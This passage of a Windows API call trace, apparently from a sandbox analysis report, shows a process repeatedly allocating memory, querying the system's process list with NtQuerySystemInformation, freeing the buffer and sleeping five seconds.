Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.477] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.500] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.514] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.521] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.535] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.543] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.550] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.557] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.581] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.603] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.611] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.618] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.625] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 